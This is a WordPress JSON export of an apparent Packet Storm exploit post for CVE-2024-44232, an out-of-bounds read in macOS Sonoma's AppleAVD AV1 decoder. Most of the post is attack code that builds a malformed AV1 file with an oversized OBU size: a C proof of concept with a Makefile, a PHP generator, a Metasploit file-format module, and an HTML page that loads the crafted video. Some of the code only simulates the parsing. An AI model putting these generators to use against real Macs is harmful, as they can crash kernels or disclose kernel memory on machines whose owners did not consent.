{"id":28301,"date":"2025-12-02T15:33:14","date_gmt":"2025-12-02T15:33:14","guid":{"rendered":"http:\/\/localhost\/?p=28301"},"modified":"2025-12-02T15:33:14","modified_gmt":"2025-12-02T15:33:14","slug":"macos-sonoma-145-denial-of-service","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=28301","title":{"rendered":"\ud83d\udcc4 macOS Sonoma 14.5 Denial of Service_PACKETSTORM:212319"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-02T19:41:26&#8243;,&#8221;description&#8221;:&#8221;macOS Sonoma version 14.5 has a vulnerability in the AV1Syntax::ParseHeader function that can allow for a kernel crash&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 macOS Sonoma 14.5 Denial of Service&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212319&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-44232&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : macOS Sonoma 14.5 potential kernel crash                                                                                    |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\\n    | # Vendor    : System built\u2011in component. No standalone download available.                                                                |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/202851\/ \\u0026  CVE-2024-44232\\n    \\n    [+] Summary : \\n    \\n                 The vulnerability resides in the AV1_Syntax::Parse_Header function, where the size of AV1 OBUs (Open Bitstream Units) is parsed incorrectly. \\n    \\t\\t\\t Due to insufficient validation of OBU sizes, a specially crafted AV1 video file can cause the parser to compute an excessively large size value. When this malformed size is later used during parsing, it can trigger an Out-of-Bounds Read.\\n                 This flaw is tracked as CVE-2024-44232, a critical out-of-bounds read vulnerability in Apple\u2019s hardware-accelerated AppleAVD AV1 decoding kernel extension. \\n    \\t\\t\\t The issue affects macOS systems equipped with hardware AV1 decoder support.\\n    \\t\\t\\t \\n    [+] Discovered by Google Project Zero, the vulnerability may lead to:\\n    \\n        Kernel memory disclosure, or Kernel crashes (DoS)\\n        simply by processing a malicious AV1 video file.\\n    \\n    \\n    [+]  POC : \\n    \\n    for php : php poc.php\\n    \\n    Makefile for C PoC\\n    makefile\\n    \\n    # Makefile for CVE-2024-44232 PoC\\n    CC = gcc\\n    CFLAGS = -Wall -Wextra -std=c99\\n    TARGET = av1_poc\\n    SRC = av1_poc.c\\n    \\n    all: $(TARGET)\\n    \\n    $(TARGET): $(SRC)\\n    \\t$(CC) $(CFLAGS) -o $(TARGET) $(SRC)\\n    \\n    clean:\\n    \\trm -f $(TARGET) *.av1\\n    \\n    test: $(TARGET)\\n    \\t.\/$(TARGET)\\n    \\n    .PHONY: all clean test\\n    \\n    \ud83d\udd27 Compilation and Usage\\n    For C Version:\\n    bash\\n    \\n    gcc -Wall -o av1_poc av1_poc.c\\n    .\/av1_poc\\n    \\n    ************************\\n    C Language PoC :\\n    ************************\\n    \\n    #include \\u003cstdio.h\\u003e\\n    #include \\u003cstdlib.h\\u003e\\n    #include \\u003cstring.h\\u003e\\n    #include \\u003cstdint.h\\u003e\\n    \\n    \/\/ Basic OBU structure\\n    typedef struct {\\n        uint8_t type;\\n        uint8_t extension_flag;\\n        uint8_t has_size;\\n        uint64_t size;\\n    } obu_header_t;\\n    \\n    \/\/ Create malformed AV1 with oversized OBU\\n    void create_malformed_av1(uint8_t **buffer, size_t *size) {\\n        \/\/ AV1 basic signature\\n        uint8_t av1_signature[] = {0x81, 0x00, 0x00, 0x00};\\n        \\n        \/\/ OBU with extremely large size\\n        obu_header_t obu;\\n        obu.type = 0x0F; \/\/ Unknown\/Padding type (triggers vulnerable path)\\n        obu.extension_flag = 0x00;\\n        obu.has_size = 0x01;\\n        obu.size = 0xFFFFFFFFFFFFFFFF; \/\/ Maximum size\\n        \\n        \/\/ Calculate total size\\n        size_t header_size = sizeof(av1_signature);\\n        size_t obu_size = 4 + 8; \/\/ OBU header + encoded OBU size\\n        *size = header_size + obu_size;\\n        \\n        \/\/ Allocate memory\\n        *buffer = (uint8_t*)malloc(*size);\\n        if (!*buffer) {\\n            printf(\\&#8221;Memory allocation failed\\\\n\\&#8221;);\\n            return;\\n        }\\n        \\n        \/\/ Copy signature\\n        memcpy(*buffer, av1_signature, sizeof(av1_signature));\\n        \\n        \/\/ Build OBU header\\n        uint8_t *ptr = *buffer + header_size;\\n        \\n        \/\/ Type and extension field\\n        *ptr++ = (obu.type \\u003c\\u003c 3) | (obu.extension_flag \\u003c\\u003c 2) | (obu.has_size \\u003c\\u003c 1);\\n        \\n        \/\/ Encoded OBU size (LEB128) &#8211; very large size\\n        uint8_t leb128[] = {\\n            0xFF, 0xFF, 0xFF, 0xFF, 0xFF, \\n            0xFF, 0xFF, 0xFF, 0xFF, 0x7F  \/\/ Stop byte\\n        };\\n        memcpy(ptr, leb128, sizeof(leb128));\\n        ptr += sizeof(leb128);\\n        \\n        printf(\\&#8221;Malformed AV1 file created:\\\\n\\&#8221;);\\n        printf(\\&#8221;- Total size: %zu bytes\\\\n\\&#8221;, *size);\\n        printf(\\&#8221;- OBU type: 0x%02X (Unknown)\\\\n\\&#8221;, obu.type);\\n        printf(\\&#8221;- OBU size: %llu (extremely large)\\\\n\\&#8221;, obu.size);\\n    }\\n    \\n    \/\/ Simulate vulnerable OBU parsing\\n    void simulate_obu_parsing(const uint8_t *data, size_t data_size) {\\n        printf(\\&#8221;\\\\nSimulating OBU parsing&#8230;\\\\n\\&#8221;);\\n        \\n        const uint8_t *ptr = data + 4; \/\/ Skip AV1 signature\\n        const uint8_t *end = data + data_size;\\n        \\n        if (ptr \\u003e= end) {\\n            printf(\\&#8221;Insufficient data\\\\n\\&#8221;);\\n            return;\\n        }\\n        \\n        \/\/ Read OBU header\\n        uint8_t obu_header = *ptr++;\\n        uint8_t obu_type = (obu_header \\u003e\\u003e 3) \\u0026 0x1F;\\n        uint8_t extension_flag = (obu_header \\u003e\\u003e 2) \\u0026 0x1;\\n        uint8_t has_size = (obu_header \\u003e\\u003e 1) \\u0026 0x1;\\n        \\n        printf(\\&#8221;OBU Header:\\\\n\\&#8221;);\\n        printf(\\&#8221;- Type: 0x%02X\\\\n\\&#8221;, obu_type);\\n        printf(\\&#8221;- Extension flag: %d\\\\n\\&#8221;, extension_flag);\\n        printf(\\&#8221;- Has size: %d\\\\n\\&#8221;, has_size);\\n        \\n        if (!has_size) {\\n            printf(\\&#8221;No OBU size field\\\\n\\&#8221;);\\n            return;\\n        }\\n        \\n        \/\/ Simulate reading OBU size (vulnerable code)\\n        uint64_t obu_size = 0;\\n        int shift = 0;\\n        int bytes_read = 0;\\n        int max_bytes = 8;\\n        \\n        printf(\\&#8221;Reading OBU size (LEB128):\\\\n\\&#8221;);\\n        \\n        while (bytes_read \\u003c max_bytes) {\\n            if (ptr \\u003e= end) {\\n                printf(\\&#8221;End of data while reading size\\\\n\\&#8221;);\\n                break;\\n            }\\n            \\n            uint8_t byte = *ptr++;\\n            bytes_read++;\\n            \\n            obu_size |= (uint64_t)(byte \\u0026 0x7F) \\u003c\\u003c shift;\\n            printf(\\&#8221;  Byte %d: 0x%02X, Current size: %llu\\\\n\\&#8221;, \\n                   bytes_read, byte, obu_size);\\n            \\n            if ((byte \\u0026 0x80) == 0) {\\n                break;\\n            }\\n            \\n            shift += 7;\\n            if (bytes_read == max_bytes) {\\n                printf(\\&#8221;  Reached max bytes\\\\n\\&#8221;);\\n                break;\\n            }\\n        }\\n        \\n        printf(\\&#8221;Final OBU size: %llu\\\\n\\&#8221;, obu_size);\\n        printf(\\&#8221;Remaining buffer bytes: %ld\\\\n\\&#8221;, end &#8211; ptr);\\n        \\n        \/\/ Simulate the vulnerable out-of-bounds read\\n        if (obu_type == 0x0F) { \/\/ Unknown\/Padding type\\n            printf(\\&#8221;\\\\nTriggering unknown OBU path&#8230;\\\\n\\&#8221;);\\n            \\n            \/\/ This simulates the vulnerable code:\\n            \/\/ while ( v31 + v83 )  \\n            \/\/ {  \\n            \/\/   if ( v8[v36 &#8211; 1 + v31 + v37 + v22 + v83&#8211;] )  \\n            \\n            size_t remaining_data = end &#8211; ptr;\\n            if (obu_size \\u003e remaining_data) {\\n                printf(\\&#8221;\u2757 POTENTIAL OUT-OF-BOUNDS READ!\\\\n\\&#8221;);\\n                printf(\\&#8221;\u2757 OBU requests %llu bytes but only %zu bytes available\\\\n\\&#8221;, \\n                       obu_size, remaining_data);\\n                printf(\\&#8221;\u2757 Difference: %lld bytes beyond bounds\\\\n\\&#8221;, \\n                       obu_size &#8211; remaining_data);\\n            } else {\\n                printf(\\&#8221;Sufficient data for OBU\\\\n\\&#8221;);\\n            }\\n        }\\n    }\\n    \\n    \/\/ Main test cycle\\n    int main() {\\n        printf(\\&#8221;=== CVE-2024-44232 PoC &#8211; AppleAVD OOB Read ===\\\\n\\&#8221;);\\n        printf(\\&#8221;Out-of-bounds read in AV1 decoding\\\\n\\\\n\\&#8221;);\\n        \\n        uint8_t *malformed_av1 = NULL;\\n        size_t file_size = 0;\\n        \\n        \/\/ Create malformed AV1 file\\n        create_malformed_av1(\\u0026malformed_av1, \\u0026file_size);\\n        \\n        if (malformed_av1) {\\n            \/\/ Simulate vulnerable processing\\n            simulate_obu_parsing(malformed_av1, file_size);\\n            \\n            \/\/ Cleanup\\n            free(malformed_av1);\\n        }\\n        \\n        printf(\\&#8221;\\\\n=== Test completed ===\\\\n\\&#8221;);\\n        return 0;\\n    }\\n    \\n    -********************\\n    PHP PoC\\n    -**\/*\/*\/*\/*\/*\/*\/*\/*\/*\/\\n    \\n    \\u003c?php\\n    \/**\\n     * CVE-2024-44232 PoC &#8211; AppleAVD Out-of-Bounds Read\\n     * PHP malformed AV1 file generator\\n     * by indoushka\\n     *\/\\n    \\n    class AV1MalformedGenerator {\\n        \\n        private $debug = true;\\n        \\n        public function log($message) {\\n            if ($this-\\u003edebug) {\\n                echo \\&#8221;[INFO] \\&#8221; . $message . \\&#8221;\\\\n\\&#8221;;\\n            }\\n        }\\n        \\n        public function generateMalformedAV1() {\\n            $this-\\u003elog(\\&#8221;Generating malformed AV1 file for CVE-2024-44232\\&#8221;);\\n            \\n            \/\/ AV1 signature\\n            $av1_signature = \\&#8221;\\\\x81\\\\x00\\\\x00\\\\x00\\&#8221;;\\n            \\n            \/\/ Create OBU with huge size\\n            $obu_header = $this-\\u003ecreateObuHeader(0x0F, false, true); \/\/ Unknown type\\n            \\n            \/\/ Create oversized LEB128\\n            $leb128_size = $this-\\u003ecreateLargeLeb128(0x7FFFFFFFFFFFFFFF);\\n            \\n            \/\/ Build the data\\n            $malformed_data = $av1_signature . $obu_header . $leb128_size;\\n            \\n            $this-\\u003elog(\\&#8221;Malformed data generated:\\&#8221;);\\n            $this-\\u003elog(\\&#8221; &#8211; Total size: \\&#8221; . strlen($malformed_data) . \\&#8221; bytes\\&#8221;);\\n            $this-\\u003elog(\\&#8221; &#8211; OBU type: 0x0F (Unknown)\\&#8221;);\\n            $this-\\u003elog(\\&#8221; &#8211; OBU size: extremely large\\&#8221;);\\n            \\n            return $malformed_data;\\n        }\\n        \\n        private function createObuHeader($type, $extension_flag, $has_size) {\\n            $header = ($type \\u003c\\u003c 3) | ($extension_flag \\u003c\\u003c 2) | ($has_size \\u003c\\u003c 1);\\n            return chr($header);\\n        }\\n        \\n        private function createLargeLeb128($size) {\\n            $leb128 = \\&#8221;\\&#8221;;\\n            $value = $size;\\n            \\n            do {\\n                $byte = $value \\u0026 0x7F;\\n                $value \\u003e\\u003e= 7;\\n                \\n                if ($value != 0) {\\n                    $byte |= 0x80;\\n                }\\n                \\n                $leb128 .= chr($byte);\\n            } while ($value != 0);\\n            \\n            \/\/ Add extra bytes to make size huge\\n            while (strlen($leb128) \\u003c 10) {\\n                $leb128 .= chr(0xFF);\\n            }\\n            $leb128 .= chr(0x7F); \/\/ Stop byte\\n            \\n            $this-\\u003elog(\\&#8221;Created LEB128 size: \\&#8221; . strlen($leb128) . \\&#8221; bytes\\&#8221;);\\n            \\n            return $leb128;\\n        }\\n        \\n        public function saveToFile($filename = \\&#8221;malformed.av1\\&#8221;) {\\n            $data = $this-\\u003egenerateMalformedAV1();\\n            \\n            if (file_put_contents($filename, $data)) {\\n                $this-\\u003elog(\\&#8221;File saved as: \\&#8221; . $filename);\\n                $this-\\u003eanalyzeFile($filename);\\n                return true;\\n            } else {\\n                $this-\\u003elog(\\&#8221;Failed to save file\\&#8221;);\\n                return false;\\n            }\\n        }\\n        \\n        private function analyzeFile($filename) {\\n            $data = file_get_contents($filename);\\n            $this-\\u003elog(\\&#8221;\\\\nFile analysis:\\&#8221;);\\n            $this-\\u003elog(\\&#8221;Size: \\&#8221; . strlen($data) . \\&#8221; bytes\\&#8221;);\\n            $this-\\u003elog(\\&#8221;First bytes: \\&#8221; . bin2hex(substr($data, 0, 16)));\\n            \\n            \/\/ Simulate vulnerable parsing\\n            $this-\\u003esimulateVulnerableParsing($data);\\n        }\\n        \\n        private function simulateVulnerableParsing($data) {\\n            $this-\\u003elog(\\&#8221;\\\\nSimulating vulnerable parsing:\\&#8221;);\\n            \\n            if (strlen($data) \\u003c 5) {\\n                $this-\\u003elog(\\&#8221;Insufficient data\\&#8221;);\\n                return;\\n            }\\n            \\n            $ptr = 4; \/\/ Skip signature\\n            $obu_header = ord($data[$ptr++]);\\n            \\n            $type = ($obu_header \\u003e\\u003e 3) \\u0026 0x1F;\\n            $has_size = ($obu_header \\u003e\\u003e 1) \\u0026 0x1;\\n            \\n            $this-\\u003elog(\\&#8221;OBU header: 0x\\&#8221; . dechex($obu_header));\\n            $this-\\u003elog(\\&#8221;Type: 0x\\&#8221; . dechex($type));\\n            $this-\\u003elog(\\&#8221;Has size: \\&#8221; . $has_size);\\n            \\n            if ($has_size) {\\n                $obu_size = 0;\\n                $shift = 0;\\n                $bytes_read = 0;\\n                \\n                while ($bytes_read \\u003c 10 \\u0026\\u0026 $ptr \\u003c strlen($data)) {\\n                    $byte = ord($data[$ptr++]);\\n                    $bytes_read++;\\n                    \\n                    $obu_size |= ($byte \\u0026 0x7F) \\u003c\\u003c $shift;\\n                    \\n                    if (($byte \\u0026 0x80) == 0) {\\n                        break;\\n                    }\\n                    \\n                    $shift += 7;\\n                }\\n                \\n                $this-\\u003elog(\\&#8221;Parsed size: \\&#8221; . $obu_size);\\n                $this-\\u003elog(\\&#8221;Remaining bytes: \\&#8221; . (strlen($data) &#8211; $ptr));\\n                \\n                if ($obu_size \\u003e (strlen($data) &#8211; $ptr)) {\\n                    $this-\\u003elog(\\&#8221;\u26a0\ufe0f  POTENTIAL OUT-OF-BOUNDS READ!\\&#8221;);\\n                    $this-\\u003elog(\\&#8221;\u26a0\ufe0f  Requested: \\&#8221; . $obu_size . \\&#8221; bytes\\&#8221;);\\n                    $this-\\u003elog(\\&#8221;\u26a0\ufe0f  Available: \\&#8221; . (strlen($data) &#8211; $ptr) . \\&#8221; bytes\\&#8221;);\\n                }\\n            }\\n        }\\n    }\\n    \\n    \/\/ Usage\\n    if (php_sapi_name() === &#8216;cli&#8217;) {\\n        $generator = new AV1MalformedGenerator();\\n        \\n        if (isset($argv[1])) {\\n            $filename = $argv[1];\\n        } else {\\n            $filename = \\&#8221;cve_2024_44232_poc.av1\\&#8221;;\\n        }\\n        \\n        $generator-\\u003esaveToFile($filename);\\n        \\n        echo \\&#8221;\\\\n=== Test file generated ===\\\\n\\&#8221;;\\n        echo \\&#8221;Use this file to test the vulnerability on macOS systems\\\\n\\&#8221;;\\n        echo \\&#8221;with AppleAVD extension and hardware AV1 decoder support\\\\n\\&#8221;;\\n    }\\n    ?\\u003e\\n    \\n    ***********************\\n    Metasploit Module\\n    ***********************\\n    ##\\n    # Metasploit module for CVE-2024-44232\\n    ##\\n    \\n    require &#8216;msf\/core&#8217;\\n    \\n    class MetasploitModule \\u003c Msf::Auxiliary\\n      \\n      include Msf::Exploit::FILEFORMAT\\n      \\n      def initialize(info = {})\\n        super(update_info(info,\\n          &#8216;Name&#8217;           =\\u003e &#8216;AppleAVD AV1 OBU Out-of-Bounds Read&#8217;,\\n          &#8216;Description&#8217;    =\\u003e %q{\\n            This module generates a malformed AV1 file that triggers\\n            an out-of-bounds read in AppleAVD kernel extension.\\n            CVE-2024-44232.\\n          },\\n          &#8216;Author&#8217;         =\\u003e [&#8216;indoushka&#8217;],\\n          &#8216;License&#8217;        =\\u003e MSF_LICENSE,\\n          &#8216;References&#8217;     =\\u003e [\\n            [&#8216;CVE&#8217;, &#8216;2024-44232&#8217;],\\n            [&#8216;URL&#8217;, &#8216;https:\/\/googleprojectzero.blogspot.com\/&#8217;]\\n          ],\\n          &#8216;DisclosureDate&#8217; =\\u003e &#8216;2024-07-24&#8217;\\n        ))\\n        \\n        register_options([\\n          OptString.new(&#8216;FILENAME&#8217;, [true, &#8216;The output filename&#8217;, &#8216;malformed.av1&#8217;])\\n        ])\\n      end\\n      \\n      def run\\n        # AV1 signature\\n        av1_signature = \\&#8221;\\\\x81\\\\x00\\\\x00\\\\x00\\&#8221;\\n        \\n        # OBU header with unknown type\\n        obu_header = create_obu_header(0x0F, false, true)\\n        \\n        # Large LEB128 size\\n        leb128_size = create_large_leb128(0x7FFFFFFFFFFFFFFF)\\n        \\n        # Build the file\\n        malformed_data = av1_signature + obu_header + leb128_size\\n        \\n        print_status(\\&#8221;Creating malformed AV1 file&#8230;\\&#8221;)\\n        print_status(\\&#8221;Total size: #{malformed_data.length} bytes\\&#8221;)\\n        print_status(\\&#8221;OBU type: 0x0F (Unknown)\\&#8221;)\\n        print_status(\\&#8221;Large OBU size to trigger OOB read\\&#8221;)\\n        \\n        file_create(malformed_data)\\n        print_good(\\&#8221;Malformed AV1 file created: #{datastore[&#8216;FILENAME&#8217;]}\\&#8221;)\\n      end\\n      \\n      def create_obu_header(type, extension_flag, has_size)\\n        header = (type \\u003c\\u003c 3) | (extension_flag ? 1 \\u003c\\u003c 2 : 0) | (has_size ? 1 \\u003c\\u003c 1 : 0)\\n        [header].pack(&#8216;C&#8217;)\\n      end\\n      \\n      def create_large_leb128(size)\\n        leb128 = \\&#8221;\\&#8221;\\n        value = size\\n        \\n        begin\\n          byte = value \\u0026 0x7F\\n          value \\u003e\\u003e= 7\\n          \\n          if value != 0\\n            byte |= 0x80\\n          end\\n          \\n          leb128 \\u003c\\u003c [byte].pack(&#8216;C&#8217;)\\n        end while value != 0\\n        \\n        # Make the size larger\\n        while leb128.length \\u003c 10\\n          leb128 \\u003c\\u003c \\&#8221;\\\\xFF\\&#8221;\\n        end\\n        leb128 \\u003c\\u003c \\&#8221;\\\\x7F\\&#8221;\\n        \\n        leb128\\n      end\\n    end\\n    \\n    **************************\\n    HTML Test Page\\n    \/\/\/\/\/\/\/\/*****************\\n    \\u003c!DOCTYPE html\\u003e\\n    \\u003chtml\\u003e\\n    \\u003chead\\u003e\\n        \\u003ctitle\\u003eCVE-2024-44232 Test\\u003c\/title\\u003e\\n    \\u003c\/head\\u003e\\n    \\u003cbody\\u003e\\n        \\u003ch1\\u003eindoushka-AppleAVD Vulnerability Test Page\\u003c\/h1\\u003e\\n        \\n        \\u003cvideo id=\\&#8221;testVideo\\&#8221; width=\\&#8221;320\\&#8221; height=\\&#8221;240\\&#8221; controls\\u003e\\n            \\u003csource src=\\&#8221;malformed.av1\\&#8221; type=\\&#8221;video\/av1\\&#8221;\\u003e\\n            Browser does not support AV1.\\n        \\u003c\/video\\u003e\\n        \\n        \\u003cscript\\u003e\\n            \/\/ Try to load the malformed video\\n            const video = document.getElementById(&#8216;testVideo&#8217;);\\n            \\n            video.addEventListener(&#8216;error&#8217;, function(e) {\\n                console.log(&#8216;Video loading error:&#8217;, e);\\n                document.getElementById(&#8216;status&#8217;).innerHTML = \\n                    &#8216;Error detected &#8211; vulnerability may have been triggered&#8217;;\\n            });\\n            \\n            video.addEventListener(&#8216;load&#8217;, function(e) {\\n                document.getElementById(&#8216;status&#8217;).innerHTML = \\n                    &#8216;Video loaded successfully&#8217;;\\n            });\\n        \\u003c\/script\\u003e\\n        \\n        \\u003cdiv id=\\&#8221;status\\&#8221;\\u003ePreparing&#8230;\\u003c\/div\\u003e\\n        \\u003cdiv id=\\&#8221;info\\&#8221;\\u003e\\n            \\u003cp\\u003eThis is a test for CVE-2024-44232 in AppleAVD\\u003c\/p\\u003e\\n            \\u003cp\\u003eOn macOS systems with hardware AV1 decoder support\\u003c\/p\\u003e\\n        \\u003c\/div\\u003e\\n    \\u003c\/body\\u003e\\n    \\u003c\/html\\u003e\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/212319&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:6.5,&#8221;severity&#8221;:&#8221;MEDIUM&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:R\/S:U\/C:N\/I:N\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/212319\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-02T19:41:26&#8243;,&#8221;description&#8221;:&#8221;macOS Sonoma version 14.5 has a vulnerability in the AV1Syntax::ParseHeader function that can allow for a kernel crash&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 macOS Sonoma 14.5 Denial of Service&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212319&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-44232&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n |&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,26,12,21,13,53,7,11,5],"class_list":["post-28301","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-65","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 macOS Sonoma 14.5 Denial of Service_PACKETSTORM:212319 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=28301\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 macOS Sonoma 14.5 Denial of Service_PACKETSTORM:212319 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-02T19:41:26&#8243;,&#8221;description&#8221;:&#8221;macOS Sonoma version 14.5 has a vulnerability in the AV1Syntax::ParseHeader function that can allow for a kernel crash&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 macOS Sonoma 14.5 Denial of Service&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212319&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-44232&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n |...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=28301\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-02T15:33:14+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"13 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28301#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28301\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 macOS Sonoma 14.5 Denial of Service_PACKETSTORM:212319\",\"datePublished\":\"2025-12-02T15:33:14+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28301\"},\"wordCount\":2546,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-6.5\",\"exploit\",\"MEDIUM\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28301#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28301\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28301\",\"name\":\"\ud83d\udcc4 macOS Sonoma 14.5 Denial of Service_PACKETSTORM:212319 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-02T15:33:14+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28301#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28301\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28301#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 macOS Sonoma 14.5 Denial of 